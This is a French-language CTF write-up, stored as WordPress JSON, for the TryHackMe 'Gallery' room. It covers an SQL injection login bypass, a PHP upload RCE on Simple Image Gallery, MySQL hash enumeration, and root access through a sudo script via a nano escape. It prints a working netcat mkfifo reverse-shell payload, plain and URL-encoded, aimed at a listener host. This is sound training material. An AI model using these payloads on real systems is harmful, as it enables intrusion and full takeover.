{"id":1694,"date":"2021-05-24T18:02:46","date_gmt":"2021-05-24T16:02:46","guid":{"rendered":"https:\/\/mikadmin.fr\/blog\/?p=1694"},"modified":"2022-02-12T13:11:23","modified_gmt":"2022-02-12T12:11:23","slug":"tryhackme-gallery","status":"publish","type":"post","link":"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/","title":{"rendered":"[TryHackme] \u2013 Gallery"},"content":{"rendered":"<\/span> 4<\/span> min read<\/span><\/span>

Views: 2997<\/p>\n

<\/div>\n\n\n\n
\"tryhackme\"<\/figure><\/div>\n\n\n\n

Lien :<\/strong> https:\/\/tryhackme.com\/room\/gallery<\/a><\/p>\n\n\n\n

\n\n\n\n

[Web]<\/h1>\n\n\n\n

Dans un premier temps, nous allons effectuer un scan nmap<\/span><\/strong> afin de d\u00e9couvrir les services disponibles et r\u00e9pondre \u00e0 la premi\u00e8re question.<\/p>\n\n\n\n

<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n

Il y a donc 2 ports ouverts<\/strong> avec un cms tr\u00e8s int\u00e9ressant sur le port 8080<\/strong> :<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n
\n\n\n\n
<\/div>\n\n\n\n

Ce blog est donc propuls\u00e9 par le cms Simple Image Gallery<\/a><\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n
\n\n\n\n
<\/div>\n\n\n\n

Apr\u00e8s plusieurs recherches on trouve un exploit d\u00e9j\u00e0 pr\u00e9par\u00e9 sur exploit-db<\/a> !<\/p>\n\n\n\n

<\/p>\n\n\n\n

<\/div>\n\n\n\n

Le processus est tr\u00e8s simple :<\/p>\n\n\n\n

<\/div>\n\n\n\n

Dans un premier temps, il s’agit de l’exploitation d’une SQL Injection<\/a><\/strong> sur le formulaire de login :<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

Cette derni\u00e8re peut-\u00eatre exploit\u00e9e \u00e9galement \u00e0 la main :<\/p>\n\n\n\n

# SQLI Bypass Login\nusername : admin' OR 1=1 -- -\npassword : random<\/code><\/pre>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\n\n\n\n
<\/div>\n\n\n\n
Dans un second temps, il s’agit d’une faille upload permettant une RCE<\/a> :<\/p>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/p>\n\n\n\n
<\/div>\n\n\n\n
Nous allons donc utiliser l’exploit pour gagner du temps :<\/p>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\n\n\n\n
C’est l’heure du reverse shell et pour ce faire nous allons url encoder<\/a> ce dernier :<\/p>\n\n\n\n
rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc 10.11.20.2 1234 >\/tmp\/f<\/code><\/pre>\n\n\n\n
# Payload reverse shell\nhttp:\/\/10.10.7.161\/gallery\/uploads\/1629904320_TagozwrwnipzjxfhroaLetta.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.11.20.2%201234%20%3E%2Ftmp%2Ff<\/code><\/pre>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\n\n\n\n
<\/div>\n\n\n\n
Afin de r\u00e9cup\u00e9rer le hash de l’administrateur nous devons regarder plus en d\u00e9tail le fichier initialize.php<\/strong> qui nous donne donc les identifiants de connexion \u00e0 la base de donn\u00e9es :<\/p>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
Apr\u00e8s avoir \u00e9num\u00e9rer cette derni\u00e8re on y trouve bien le hash que l’on recherche :<\/p>\n\n\n\n
mysql -u gallery_user -p\nshow databases;\nuse gallery_db;\nshow tables;\nselect * from users;<\/code><\/pre>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/div>\n\n\n\n
\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
[User]<\/h1>\n\n\n\n
<\/div>\n\n\n\n
Apr\u00e8s \u00e9num\u00e9ration on trouve un dossier tr\u00e8s int\u00e9ressant dans le r\u00e9pertoire \/var\/backups<\/strong> :<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
On peut donc retrouver un backup<\/strong> d’une partie du home de mike<\/strong> cependant nous pouvons tout lire et m\u00eame le bash_history<\/strong><\/span> <\/strong>qui nous r\u00e9v\u00e8le l’erreur de mike<\/strong>..<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
Nous pouvons donc r\u00e9cup\u00e9rer le flag user gr\u00e2ce au mot de passe de mike<\/strong>.<\/p>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\n\n\n\n
<\/p>\n\n\n\n
[Root]<\/h1>\n\n\n\n
<\/div>\n\n\n\n
Nous pouvons voir que Mike<\/strong> peut lancer un script \u00e0 l’aide de sudo<\/a><\/span><\/strong> et en tant que l’utilisateur root<\/span><\/strong> :<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
Nous pouvons donc lancer ce dernier avec la commande :<\/p>\n\n\n\n
sudo \/bin\/bash \/opt\/rootkit.sh<\/code><\/pre>\n\n\n\n
<\/div>\n\n\n\n
Nous avons donc 4 choix propos\u00e9s :<\/p>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
Ces choix l\u00e0 sont des param\u00e8tres \u00e0 rkhunter<\/a>.<\/p>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
Mais pas le dernier qui nous permet de lire\/\u00e9diter un report<\/strong>, mais il ne faut pas oublier qu’il permet de faire cette action en tant que root<\/span><\/strong> !<\/p>\n\n\n\n
\n\n\n\n
Nous pouvons donc nous aider du fameux GTFOBins<\/a> :<\/p>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
sudo nano\n^R^X\nreset; sh 1>&0 2>&0<\/code><\/pre>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n","protected":false},"excerpt":{"rendered":"
<\/span>  4<\/span> min read<\/span><\/span>Gallery is a tryhackme room designed by me. You will exploit an SQL injection and deal with a custom script to escalate to the root user. Continuer la lecture →<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":45,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_themeisle_gutenberg_block_has_review":false,"footnotes":""},"categories":[4,3],"tags":[64,9,23,78,22,63],"class_list":["post-1694","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-infosec","category-system","tag-cve","tag-linux","tag-privesc","tag-sqli","tag-tryhackme","tag-writeup"],"aioseo_notices":[],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/1694","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/comments?post=1694"}],"version-history":[{"count":0,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/1694\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/media\/45"}],"wp:attachment":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/media?parent=1694"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/categories?post=1694"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/tags?post=1694"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}